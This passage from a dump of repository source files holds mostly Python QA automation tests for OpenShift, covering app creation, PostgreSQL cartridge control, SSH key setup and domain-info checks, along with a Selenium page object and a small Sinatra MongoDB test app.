inspect.isclass(obj) and \\\n issubclass(obj, BaseCommand) and \\\n obj.__module__ == module.__name__:\n yield obj\n\n\ndef _get_commands_from_module(module):\n d = {}\n for cmd in _iter_command_classes(module):\n cmdname = cmd.__module__.split('.')[-1]\n d[cmdname] = cmd()\n return d\n\ndef _get_commands_from_entry_points(group='scmd.commands'):\n cmds = {}\n for entry_point in pkg_resources.iter_entry_points(group):\n obj = entry_point.load()\n if inspect.isclass(obj):\n cmds[entry_point.name] = obj()\n else:\n raise Exception(\"Invalid entry point %s\" % entry_point.name)\n return cmds\n\ndef _get_commands_dict(settings):\n cmds = _get_commands_from_module('scmd.commands')\n return cmds\n\ndef _pop_command_name(argv):\n i = 0\n for arg in argv[1:]:\n if not arg.startswith('-'):\n del argv[i]\n return arg\n i += 1\n\ndef _print_header(settings):\n print \"SCMD - wrong operations\\n\"\n\ndef _print_commands(settings):\n _print_header(settings)\n print \"Usage:\"\n print \" scmd <command> [options] [args]\\n\"\n print \"Available commands:\"\n cmds = _get_commands_dict(settings)\n for cmdname, cmdclass in sorted(cmds.iteritems()):\n print \" %-13s %s\" % (cmdname, cmdclass.short_desc())\n print\n print 'Use \"scmd <command> -h\" to see more info about a command'\n\ndef _print_unknown_command(settings, cmdname):\n _print_header(settings)\n print \"Unknown command: %s\\n\" % cmdname\n print 'Use \"scmd\" to see available commands' \n\ndef _run_print_help(parser, func, *a, **kw):\n try:\n func(*a, **kw)\n except UsageError, e:\n if str(e):\n parser.error(str(e))\n if e.print_help:\n parser.print_help()\n sys.exit(2)\n\ndef execute(argv=None, settings=None):\n if argv is None:\n argv = sys.argv\n\n if settings is None:\n settings = 'nothing'\n\n cmds = _get_commands_dict(settings)\n cmdname = _pop_command_name(argv)\n parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter(), \\\n conflict_handler='resolve')\n if not cmdname:\n _print_commands(settings)\n sys.exit(0)\n elif cmdname not in cmds:\n _print_unknown_command(settings, cmdname)\n sys.exit(2)\n\n cmd = cmds[cmdname]\n parser.usage = \"scmd %s %s\" % (cmdname, cmd.syntax())\n parser.description = cmd.long_desc()\n cmd.add_options(parser)\n opts, args = parser.parse_args(args=argv[1:])\n _run_print_help(parser, cmd.process_options, args, opts)\n _run_print_help(parser, _run_command, cmd, args, opts)\n sys.exit(cmd.exitcode)\n\ndef _run_command(cmd, args, opts):\n cmd.run(args, opts)\n\n\nif __name__ == '__main__':\n execute()\n" }, { "alpha_fraction": 0.47417041659355164, "alphanum_fraction": 0.4806126058101654, "avg_line_length": 44.70000076293945, "blob_id": "0bc307c16f25921001e672d897fdfa9b7c4f4549", "content_id": "d16bc7151f283f74d5ff001bae7876c3b171e157", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8227, "license_type": "no_license", "max_line_length": 102, "num_lines": 180, "path": "/automation/open/testmodules/RT/cartridge/postgresql_control_embedded_cartridge.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\nFeb 9, 2012\n\n[US1386][Runtime][cartridge]Control embedded PostgreSQL\nhttps://tcms.engineering.redhat.com/case/128839/\n\"\"\"\n\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info ('[US1386][Runtime][cartridge]Control embedded PostgreSQL')\n try:\n test_name = self.get_variant()\n except:\n self.info(\"Missing variant, used `php` as default\")\n test_name = 'php'\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n self.app_type = common.app_types[test_name]\n self.app_name = test_name.split('-')[0]+common.get_random_string(7)\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass PostgresqlControlEmbededCartridge(OpenShiftTest):\n def test_method(self):\n if self.scalable:\n self.add_step(\"Creating a scalable application\",\n common.create_scalable_app,\n function_parameters = [self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n True],\n expect_description = 'The app should be created successfully',\n expect_return = 0)\n else:\n self.add_step(\"Creating an application\",\n common.create_app,\n function_parameters = [self.app_name,\n self.app_type,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n True],\n expect_description = 'The app should be created successfully',\n expect_return = 0)\n\n self.add_step('Embedding PostgreSQL to the application',\n common.embed,\n function_parameters = [self.app_name, \n 'add-%s' % ( common.cartridge_types['postgresql']), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description = 'PostgreSQL 8.4 cartridge should be embedded successfully',\n expect_return = 0)\n\n self.add_step('Ensuring the right status message of the started instance',\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\"% (\n common.cartridge_types['postgresql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'PostgreSQL 8.4 should be started',\n expect_str = ['Postgres is running'])\n\n if self.scalable:\n self.add_step('Scale up',\n common.scale_up,\n function_parameters= [self.app_name],\n expect_return = 0)\n\n self.add_step('Ensuring the right status message of the started instance',\n 'rhc cartridge status %s -a %s -l %s -p %s %s'% (\n common.cartridge_types['postgresql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'PostgreSQL 8.4 should be started',\n expect_str = ['Postgres is running'])\n\n self.add_step('Inject app with ENV page',\n common.inject_app_index_with_env,\n function_parameters = [self.app_name, self.app_type],\n expect_return = 0)\n\n self.add_step('Ensuring the right number of gears used',\n common.get_num_of_gears_by_web,\n function_parameters = [self.app_name, self.app_type],\n expect_description = 'PostgreSQL 8.4 should have 2 gears',\n )\n #expect_return = 2)\n\n self.add_step('Stopping PostgreSQL',\n \"rhc cartridge stop %s -a %s -l %s -p '%s' %s\"% (\n common.cartridge_types['postgresql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'PostgreSQL 8.4 should be stopped',\n expect_return = 0)\n\n self.add_step('Ensuring the right status message of the the stopped instance',\n \"rhc cartridge status %s -a %s -l %s -p %s %s\" % (\n common.cartridge_types['postgresql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'PostgreSQL 8.4 should be stopped',\n expect_str = ['Postgres is stopped'])\n\n self.add_step('Restarting PostgreSQL',\n 'rhc cartridge restart %s -a %s -l %s -p %s %s'% (\n common.cartridge_types['postgresql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'PostgreSQL 8.4 should be started',\n expect_return = 0)\n\n self.add_step('Ensuring the right status message of the started instance',\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\"% (\n common.cartridge_types['postgresql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'PostgreSQL 8.4 should be started',\n expect_str = ['Postgres is running'])\n\n if self.scalable:\n self.add_step('Ensuring the right number of gears used',\n common.get_num_of_gears_by_web,\n function_parameters = [self.app_name, self.app_type],\n expect_description = 'PostgreSQL 8.4 should have 2 gears',\n expect_return = 2)\n\n self.add_step('Removing PostgreSQL cartridge',\n \"rhc cartridge remove %s -a %s -l %s -p '%s' --confirm %s\"% (\n common.cartridge_types['postgresql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'The PostgreSQL cartridge should be removed',\n expect_return = 0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PostgresqlControlEmbededCartridge)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.623711347579956, "alphanum_fraction": 0.626288652420044, "avg_line_length": 26.696428298950195, "blob_id": "efbd7385b21470903204955571292949e0fe71c7", "content_id": "90fc3012acfdf262c5b008523825005d39ff692b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1552, "license_type": "no_license", "max_line_length": 78, "num_lines": 56, "path": "/automation/Example/pages/homepage.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nHome page abstraction.\n\nAuthor: Xin Gao <[email protected]>\n\"\"\"\n\n\nfrom selenium.common import exceptions as SeleniumEx\nfrom hta2.core import PageObject\nfrom hta2.tests.bugzilla.webui.ui_mapping import homepage as homepage_ui\nimport hta2.lib.selenium.ui.exceptions as ex\n\n\nclass HomePage(PageObject):\n \"\"\"\n Home page abstraction class.\n Parameters:\n * _location - initial URL to load upon instance creation\n \"\"\"\n _location = homepage_ui.location\n _model = homepage_ui.header\n _label = \"Bugzilla home page\"\n\n def init_validation(self):\n \"\"\"\n Check that user is logged in ('Sign Out' link is present).\n Return: True - success\n \"\"\"\n try:\n self.login_link\n except SeleniumEx.NoSuchElementException:\n raise ex.InitPageValidationError('This is not home page: %s' % ex)\n return True\n\n\n def login(self, username='[email protected]', password='redhat'):\n \"\"\"\n Parameters:\n * username - username\n * password - password\n Return: HomePage instance\n Throws: InitPageValidationError - all login failure scenarios failed\n \"\"\"\n #self.fill_form_values(username=username, password=password)\n self.login_link.click()\n self.username_input.send_keys(username)\n self.password_input.send_keys(password)\n self.login_btn.click()\n\n\n def open_admin_page(self):\n \"\"\"\"\"\"\n admin_url = homepage_ui.admin_url\n self._driver.get(admin_url)\n #import time\n #time.sleep(5)\n\n" }, { "alpha_fraction": 0.5815739035606384, "alphanum_fraction": 0.5856525897979736, "avg_line_length": 31.310077667236328, "blob_id": "f5dec709f16adf29934fb292ed0b909a5e18b193", "content_id": "3c5bafaed8c14f0b5173b93d7cab7fc6b4edca94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4168, "license_type": "no_license", "max_line_length": 91, "num_lines": 129, "path": "/automation/open/testmodules/RT/job_related/create_domain.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport common\nimport rhtest\nimport glob\nimport openshift\nimport shutil\nimport helper\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n etc_dir = common.get_etc_dir()\n common.env_setup()\n self.domain_name = common.getRandomString(10)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.key_files = \"%s/libra_key/id_rsa*\" %(etc_dir)\n if self.get_run_mode() == \"OnPremise\":\n self.pem_file = \"%s/onpremise/onpremise.pem\" %(etc_dir)\n else:\n self.pem_file = \"%s/libra.pem\" %(etc_dir)\n self.max_gears = common.DEV_MAX_GEARS\n\n cf = self.config\n self.rest = cf.rest_api\n\n def finalize(self):\n pass\n\n\nclass SetupSSH(OpenShiftTest):\n def test_method(self):\n if not os.path.exists(os.path.expanduser(\"~/.ssh/id_rsa.pub\")):\n # only copy the pre-configured id_rsa if one does not exist\n self.info(\"Copy already prepared libra ssh key file\")\n try:\n shutil.os.makedirs(os.path.expanduser(\"~/.ssh/\"))\n except:\n pass\n for filename in glob.glob(self.key_files):\n shutil.copy(filename, os.path.expanduser(\"~/.ssh/\"))\n os.chmod(os.path.join(os.path.expanduser(\"~/.ssh/\"), filename),\n 0400)\n \n #common.prepare_libra_sshkey()\n #common.clean_up(user_email, user_passwd)\n if not os.path.exists(os.path.join(os.path.expanduser(\"~/.ssh/\"),\n os.path.basename(self.pem_file))):\n shutil.copy(self.pem_file, os.path.expanduser(\"~/.ssh/\"))\n self.info(\"Change permission of %s to 600\" %(self.pem_file))\n os.chmod(self.pem_file, 0600)\n\n #helper.setup_ssh_config()\n\n self.info(\"Remove ssh known hosts in case host key changes\")\n path = os.path.expanduser(\"~/.ssh/known_hosts\")\n if os.path.exists(path):\n os.remove(path)\n \n self.info(\"Remove 'default' ssh key for user\")\n self.rest.key_delete('default')\n\n self.info(\"Add ssh key\")\n status, resp = self.rest.key_add({})\n import json\n jresp = json.loads(resp)\n status = jresp['status']\n print status\n self.assert_equal(status, 'created', \"Failed to add/update ssh key for user\")\n \n '''\n self.info(\"Update 'default' ssh key for user\")\n status, resp = self.rest.key_update({})\n '''\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass SetupEnv(OpenShiftTest):\n def test_method(self):\n if self.get_run_mode() == 'DEV' or self.get_run_mode() == 'OnPremise':\n self.info(\"Set max gears to %s\" % (self.max_gears))\n ret = common.set_max_gears(self.user_email, self.max_gears)\n self.assert_equal(ret, 0, \"Failed to set max gears\")\n\n #if common.is_multinode_env():\n # common.setup_multi_node_env()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass CreateDomain(OpenShiftTest):\n def test_method(self):\n\n self.info(\"Create/Alter domain for express user\")\n\n try:\n status, res = self.rest.domain_get()\n except openshift.OpenShiftNullDomainException:\n status, res = self.rest.domain_create(self.domain_name)\n self.assert_equal(status, 201, \"Domain should be created/altered successfully\")\n #else:\n #we don't need to update domain! (it's enough if exists)\n # #altering\n # status, ret = self.rest.domain_update(self.domain_name)\n\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SetupSSH)\n #suite.add_test(SetupEnv)\n suite.add_test(CreateDomain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6191696524620056, "alphanum_fraction": 0.6309584975242615, "avg_line_length": 39.64583206176758, "blob_id": "9937f1d39c00cf4f36b0e25396a9e875b471c088", "content_id": "31683755a1caae7cf1af20ab553cbbeb5a714c0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1951, "license_type": "no_license", "max_line_length": 208, "num_lines": 48, "path": "/automation/open/testmodules/RT/cartridge/app_template/mongodb/ruby/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "require 'rubygems'\nrequire 'bundler'\nrequire 'mongo'\n\nBundler.require\n\n\nget '/' do\n \"Welcome to OpenShift\\n\"\nend\n\nget '/mongo' do\n action = request.params().fetch(\"action\", \"\")\n size = request.params().fetch(\"size\", \"500000\")\n conn = Mongo::Connection.new(ENV['OPENSHIFT_MONGODB_DB_HOST'], ENV['OPENSHIFT_MONGODB_DB_PORT'])\n db = conn.db(ENV['OPENSHIFT_APP_NAME'])\n auth = db.authenticate(ENV['OPENSHIFT_MONGODB_DB_USERNAME'], ENV['OPENSHIFT_MONGODB_DB_PASSWORD'])\n if auth == false\n response_body = [200, \"Mongo authentication failed\"]\n conn.close\n return response_body\n end\n coll = db.collection(\"info\")\n if action == \"insert\"\n for i in 1..size.to_i()\n doc = {\"data\" => \"This is testing data for testing snapshoting and restoring big data in mongodb database.This is testing data for testing snapshoting and restoring big data in mongodb database.\"}\n coll.insert(doc)\n end\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />\" + size + \" records have been inserted into mongodb<br />\"]\n elsif action == \"delete\"\n coll.remove\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />All the records have been deleted from mongodb database<br />\"]\n elsif action == \"show\"\n count = coll.count\n if count == 0\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />There is no record in database<br />\"]\n else\n doc = coll.find_one\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />There are \" + count.to_s + \" records in database<br />Here's one record: #{doc['data']}\"]\n end\n else\n response_body = \"[rhc-cartridge]snapshot/restore big mysql data to existing app<br />[rhc-cartridge]snapshot/restore big mysql data to new app<br />\"\n end\n conn.close\n return response_body\nend\n\nrun Sinatra::Application\n" }, { "alpha_fraction": 0.6447721123695374, "alphanum_fraction": 0.6722519993782043, "avg_line_length": 24.70689582824707, "blob_id": "3cc7f5eed9ac2b90a927db4a3ac38b487e143825", "content_id": "150a8ff23699f40a628d8d2d03aa4b3e3776c2e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1492, "license_type": "no_license", "max_line_length": 267, "num_lines": 58, "path": "/automation/open/testmodules/UI/web/case_174333.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174333.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckEapInTechnologyPage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.go_to_home()\n web.click_element_by_link_text(\"DEVELOPERS\")\n web.click_element_by_link_text(\"Platform Features\")\n \n #check whether the EAP is added in this page.\n web.assert_element_present_by_link_text(\"JBoss Enterpise Application Platform 6.0\") \n web.assert_text_equal_by_xpath('''Market-leading open source enterprise platform for next-generation, highly transactional enterprise Java applications. Build and deploy enterprise Java in the cloud.''','''//div[@id='node-10863']/div/table/tbody/tr/td[2]''') \n \n\n self.tearDown()\n\n return self.passed(\" case_174333--CheckEapInTechnologyPage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckEapInTechnologyPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_174333.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6985294222831726, "alphanum_fraction": 0.7132353186607361, "avg_line_length": 23.285715103149414, "blob_id": "c8d8e89139f97f75ce4779a2934d87e713ac6b8d", "content_id": "72a4ea7f2a011b6399dc9e3b7ec7d55169ed6862", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 680, "license_type": "no_license", "max_line_length": 107, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbosseap_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 1, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom jbosseap_without_jenkins import EAPHotDeployWithoutJenkins\n\nclass EAPHotDeployWithJenkins(EAPHotDeployWithoutJenkins):\n def __init__(self, config):\n EAPHotDeployWithoutJenkins.__init__(self, config)\n self.config.jenkins_is_needed = True\n self.config.summary = \"[US2443] Hot deployment support for application - with Jenkins - Jboss-eap6\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5269988179206848, "alphanum_fraction": 0.538122832775116, "avg_line_length": 29.595745086669922, "blob_id": "662bd46f09b162fa16e70cde491f7c3da7c43989", "content_id": "212724f25bc49e5a289cc2acb101ae61009ba2a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4315, "license_type": "no_license", "max_line_length": 104, "num_lines": 141, "path": "/automation/open/testmodules/RT/node/apps_when_libra_service_restart.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: apps_when_libra_service_restart.py\n# Date: 2012/03/06 15:51\n# Author: [email protected]\n#\n\nimport re\nimport rhtest\nimport common\nimport OSConf\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST=\"DEV\"\n\n def initialize(self):\n self.info(\"[rhc-node] All created applications will restart when restart libra service as root\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(7)\n self.num_apps = 2\n try:\n self.app_type = self.get_variant()\n except:\n self.app_type = 'php'\n common.env_setup()\n\n def finalize(self):\n #put back original init.d script\"\n common.run_remote_cmd_as_root(\"mv -f /etc/init.d/libra.O /etc/init.d/libra\" )\n\n\nclass AppsWhenLibraServiceRestart(OpenShiftTest):\n def test_method(self):\n\n for i in range(self.num_apps):\n self.add_step(\"Create an app#%s\"%i,\n common.create_app,\n expect_description = \"App should be created successfully.\",\n function_parameters=[\"%s%s\"%(self.app_name,i), \n common.app_types[self.app_type], \n self.user_email, self.user_passwd, False],\n expect_return=0)\n \n #modify /etc/init.d/libra to sleep 20 between stop and start\n self.add_step(\n \"Edit /etc/init.d/libra to add 'sleep 20' between stopuser and startuser\",\n self.modify_init_libra,\n expect_description = \"Editation should be completed.\",\n expect_return=0)\n\n self.add_step(\"Restart libra service\",\n self.restart_libra,\n expect_description = \"Restarting should work\",\n expect_return=0)\n\n self.add_step(\"Check the number of restarting processes\",\n self.check_res,\n expect_description = \"There should be APPS=%s string found\"%self.num_apps,\n expect_return=0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n def modify_init_libra(self):\n cmd = \"\"\"rm -f /etc/init.d/libra.O; cp /etc/init.d/libra /etc/init.d/libra.O ; sed -i '\n/restartuser)/ {\nN\n/stopuser/a sleep 10\n}' /etc/init.d/libra && echo OK\n\"\"\"\n (status, output) = common.run_remote_cmd(None, cmd, as_root=True)\n obj = re.search(r\"OK\", output)\n if status==0 and obj:\n return 0\n else:\n return 1 \n\n def restart_libra(self):\n cmd ='''\ncat <<'EOF' >/root/restart_libra.sh &&\n#!/bin/sh\n\n#nohup just doesn't work...:(\n#nice nohup /etc/init.d/libra restart </dev/null &\n( /etc/init.d/libra restart >/tmp/LOG 2>&1 ) &\n\n\nexit 0\nEOF\nchmod +x /root/restart_libra.sh; /root/restart_libra.sh 2>&1 & exit 0'''\n (status, output) = common.run_remote_cmd(None,cmd , True)\n return status\n\n def check_res(self):\n uuid = []\n for i in range(self.num_apps):\n uuid.append(OSConf.get_app_uuid(\"%s%s\"%(self.app_name,i)))\n\n cmd = [\n \"sleep 0.5\",\n \"ps -ef\",\n \"grep '/bin/bash /etc/init.d/libra restartuser'\",\n \"grep -v grep >>/tmp/.abc\"]\n\n cmd2 = [\"cat /tmp/.abc \",\n \"egrep '%s'\"%(\"|\".join(uuid)),\n \"sort -k 6\",\n \"uniq -f 6\",\n \"\"\"awk '{lines++}END{print \"APPS=\" lines}'\"\"\"]\n (status, output) = common.run_remote_cmd_as_root(\n \"rm -rf /tmp/.abc \"\n + \" ; \"\n + \" for i in `seq 0 120`; do \"+\"|\".join(cmd)+\";done \"\n + \" ; \"\n + \"|\".join(cmd2)\n + \";rm -f /tmp/.abc\"\n )\n obj = re.search(r\"APPS=%s\"%self.num_apps, output)\n if status==0 and obj:\n return 0\n else: \n return 1\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AppsWhenLibraServiceRestart)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of apps_when_libra_service_restart.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5327300429344177, "alphanum_fraction": 0.540723979473114, "avg_line_length": 41.5, "blob_id": "e5bae3f0e9691177ba195e2a899dd9c9a173cc84", "content_id": "9947ee3c83002e589c54b1ec89a483e7e48f5d4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6630, "license_type": "no_license", "max_line_length": 149, "num_lines": 156, "path": "/automation/open/testmodules/RT/node/rhc_admin_domain_info.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nimport re\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = 'DEV'\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n self.app_name2 = common.getRandomString(10)\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n tcms_testcase_id = 125898\n self.domain_info_cmd=\"rhc-domain-info -l %s -p %s\"%(self.user_email, self.user_passwd)\n\n \tcommon.env_setup()\n\n def finalize(self):\n try:\n os.system(\"rm -rf %s; rm -rf %s\" % (self.app_name, self.app_name2))\n common.destroy_app(self.app_name)\n common.destroy_app(self.app_name2)\n except:\n pass\n\nclass RhcAdminDomainInfo(OpenShiftTest):\n def test_method(self):\n\n self.info(\"[US1443][BusinessIntegration]Admin Tools: rhc-get-user-info\")\n#1. Create 2 or more apps for user1 and some apps for user2.\n (testcase.TestCaseStep(\"Create an app1\",\n common.create_app,\n function_parameters=[self.app_name, common.app_types[self.app_type], self.user_email, self.user_passwd, False],\n expect_return=0)).run()\n\n (testcase.TestCaseStep(\"Create an app2\",\n common.create_app,\n function_parameters=[self.app_name2, common.app_types[self.app_type], self.user_email, self.user_passwd, False],\n expect_return=0)).run()\n\n#2. Use admin tool to get app list of user1. \n\n (testcase.TestCaseStep(\"rhc-domain-info -l\",\n self.run_n_check_remote_cmd_root,\n function_parameters=[self.domain_info_cmd, [self.app_name, self.app_name2]],\n expect_return=0)).run()\n\n#3. Compare the list got from step2 with the one generated by rhc-domain-info on the client side. \n\n (testcase.TestCaseStep(\"Local rhc-domain-info -l\",\n \"rhc-domain-info -l %s -p %s\"%(self.user_email, self.user_passwd),\n expect_string_list=[self.app_name, self.app_name2],\n expect_return=0)).run()\n\n#4. Add some aliases to the app and get app list of user1 using admin tool.\n\n cmd=\"rhc-ctl-app -a %s -c add-alias --alias 'test.com' -l %s -p %s \"%(self.app_name, self.user_email, self.user_passwd)\n (testcase.TestCaseStep(\"Add alias\",\n self.run_n_check_remote_cmd_root,\n function_parameters=[cmd,\"Success\"],\n expect_return=0)).run()\n\n (testcase.TestCaseStep(\"rhc-domain-info -l\",\n self.run_n_check_remote_cmd_root,\n function_parameters=[self.domain_info_cmd, \"Aliases: test.com\"],\n expect_return=0)).run()\n\n#5. Embed mysql(or phpmyadmin,jenkins client) to the app and get app list of user1 using admin tool. \n\n cmd=\"rhc-ctl-app -a %s -e add-%s -l %s -p %s\"%(self.app_name, common.cartridge_types['postgresql'], self.user_email, self.user_passwd)\n (testcase.TestCaseStep(\"Embed with postgresql\",\n self.run_n_check_remote_cmd_root,\n function_parameters=[cmd, \"PostgreSQL.*database added.\"],\n expect_return=0)).run()\n\n (testcase.TestCaseStep(\"rhc-domain-info -l\",\n self.run_n_check_remote_cmd_root,\n function_parameters = [self.domain_info_cmd, [common.cartridge_types[\"postgresql\"], \"Connection URL: postgresql\"]],\n expect_return=0)).run()\n\n#6. Destroy the apps using client tools and get app list of user1 using admin tool. \n\n cmd=\"rhc-ctl-app -a %s -c destroy -l %s -p %s -b\"%(self.app_name, self.user_email, self.user_passwd)\n (testcase.TestCaseStep(\"Destroy the apps using client tools\",\n self.run_n_check_remote_cmd_root,\n function_parameters=[cmd, \"Success\"],\n expect_return=0)).run()\n\n step=testcase.TestCaseStep(\"rhc-domain-info -l\",\n self.run_n_check_remote_cmd_root,\n function_parameters=[self.domain_info_cmd, None, self.app_name],\n expect_return=0)\n (retcode, output) = step.run()\n\n if retcode==0:\n return self.passed(\"%s passed\" % self.__class__.__name__)\n else:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def run_n_check_remote_cmd_root(self, cmd, expect_str=None, unexpect_str=None):\n (status, output) = common.run_remote_cmd(None, cmd, True)\n if expect_str != None and isinstance(expect_str, str):\n obj = re.search(r\"%s\"%expect_str, output)\n if (obj):\n return 0\n else:\n return 1\n elif expect_str != None and isinstance(expect_str, dict):\n for s in expect_str: #check all\n obj = re.search(r\"%s\"%s, output)\n if obj==None:\n print \"ERROR: Unable to find %s in output\"%s\n return 1\n elif expect_str == None and unexpect_str!=None and isinstance(unexpect_str, str):\n obj = re.search(r\"%s\"%unexpect_str, output)\n if (obj):\n return 1 #fail\n else:\n return 0\n elif expect_str == None and unexpect_str!=None and isinstance(unexpect_str, dict):\n for s in unexpect_str: #check all\n obj = re.search(r\"%s\"%s, output)\n if obj!=None:\n print \"ERROR: Found unexpected string %s in output\"%s\n return 1\n\n return status\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcAdminDomainInfo)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6370370388031006, "alphanum_fraction": 0.6370370388031006, "avg_line_length": 23.10714340209961, "blob_id": "d4a0984b084082c1adc2b5084ae2a9e5acdcd1e2", "content_id": "c537a6cac3d665577a1d7b53f286e0c2944486a4", "detected_licenses": [], "is_generated": false, 